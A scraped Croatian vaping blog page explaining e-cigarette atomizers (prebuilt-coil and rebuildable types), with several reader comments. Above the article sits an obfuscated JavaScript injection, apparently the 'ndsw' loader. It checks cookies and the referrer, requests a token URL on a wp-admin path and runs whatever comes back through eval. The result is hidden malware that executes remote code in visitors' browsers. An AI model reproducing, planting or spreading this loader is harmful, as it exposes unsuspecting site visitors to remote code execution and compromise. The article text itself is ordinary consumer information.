;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}
ATOMIZERI ZA E CIGARETE

ATOMIZERI ZA E CIGARETE

Uz modove za e cigarete, atomizeri ili raspršivači su jedna od osnovnih komponenti svakog osobnog isparivača. Kada govorimo o kvaliteti arome i količini pare koju nam naša elektronska cigareta daje, može se reći da je pravi izbor atomizera presudan u oblikovanju cjelokupnog vape iskustva.

Ukratko, atomizeri za e cigarete su ujedno spremnici za tekućinu kao i baza za zavojnicu ili grijač što proizvodi mješavinu pare i okusa koje dobijate sa svog isparivača. On se postavlja na mod koji daje struju te zagrijava zavojnicu što rezultira većom ili manjom količinom pare ovisno o vrsti zavojnice te snazi kojom istu zagrijavamo.

Atomizere možemo podijeliti u nekoliko kategorija, no dvije najvažnije razlike koje ćemo spomenuti danas nalazimo u raspršivačima koji koriste gotove grijače te u onima kod kojih korisnik sam izrađuje zavojnice od žice i vate ili metalne mrežice.

ATOMIZERI S GOTOVIM GRIJAČIMA

Ovi atomizeri za e cigarete su vrlo popularni među početnicima jer postavljanje i zamjena grijača zahtjeva minimalan trud i uglavnom je veoma jednostavna. Ukratko, svaki ovakav atomizer dolazi s jednom ili više vrsta zavojnica koje se kupuju zasebno i kada korisnik procijeni da ukus arome ili količina pare više nije onakva kakva treba biti, jednostavno izvadi stari grijač i zamijeni ga novim. Cijeli proces traje sve ga par minuta, a životni vijek ovih grijača ovisi o tome koliko sam korisnik pari i koje e tekućine koristi. Ipak, recimo da jedan ovakav grijač može trajati između tjedan i mjesec dana.

RBA ATOMIZERI

Ovi su atomizeri za e cigarete dobili ime od engleske riječi „rebuildable“ koja označava da je nešto obnovljivo ili da se može ponovo izgraditi. U skladu s time, kod isparivača ovog tipa korisnik sam „gradi“ svoje zavojnice što otvara cijeli jedan novi svijet mogućnosti i različitih opcija. Ako želite sami izrađivati svoje grijače, najčešće će vam biti potrebna posebna vrsta žice odgovarajuće debljine i materijala od koje ćete namotati zavojnicu. Materijali variraju, ali najčešće nailazimo na kanthal, nichrome, SS, titan itd. Pored toga, potrebna vam je vata za provlačenje kroz zavojnicu koju možete pronaći u vape shopovima, a od klasične kozmetičke vate se razlikuje po tome što nije kemijski izbijeljena i obrađena te udisanje pare koja nastaje isparivanjem tekućinom natopljene vate neće sadržati nepoželjne kemikalije. 

Želite li štogod dodati na ovu temu, napišite u komentaru!

U svakom slučaju se vidimo u live streamu petkom s početkom u 21:00 na Vaper Pub Youtube kanalu!

Choose your Reaction!
 • Zadnji gotovi grijači koje sam upotrebljavao su za Vivi novu i Evod (ak se ko sjeća toga), kupi 10 komada iz Kine, 3 ne rade i tak to,
  onda sam kupio Kayu Light, bilo je kako ću ja to, pun straha počeo sam raditi i išlo to iz prve, napominjem da onda se još nije upotrebljavala vata, već se žica motala oko špage i igle, kad je gotovo izvučeš iglu

  zaključak, trebalo bi probati sam raditi grijače jer onda je samo nebo granica

 • Iako atomizeri na gotove grijače imaju svojih prednosti,
  moj izbor je nakon korištenja jednih i drugih ipak pao na RTA.

  Ovi na gotove grijače su jednostavni za uporabu za nove Vapere,
  a dobro dođu i onim iskusnijim ako nemaju vremena i živaca igrati se rebuildom RTA atomizera.

  No, meni osobno je sad to baš fora i dobro mi dođe za ubit dosadu povremeno.

  Dakako, još uvijek imam Zlide 22mm 2ml i Zenith II na gotove grijače.
  Neka ih, ne traže kruha kak’ se ono veli.

 • Kratko i jasno. Ideja za slijedeći edukativni članak bi možda bila objašnjenje vrste žica za samostalnu izradu coila.

 • trenutno koristim DL s gotovim grijačima, još niam ušao u igru s rebuildom, ali kupio sam RBA i RTA tank, pa ću i to probati uskoro

Leave a Comment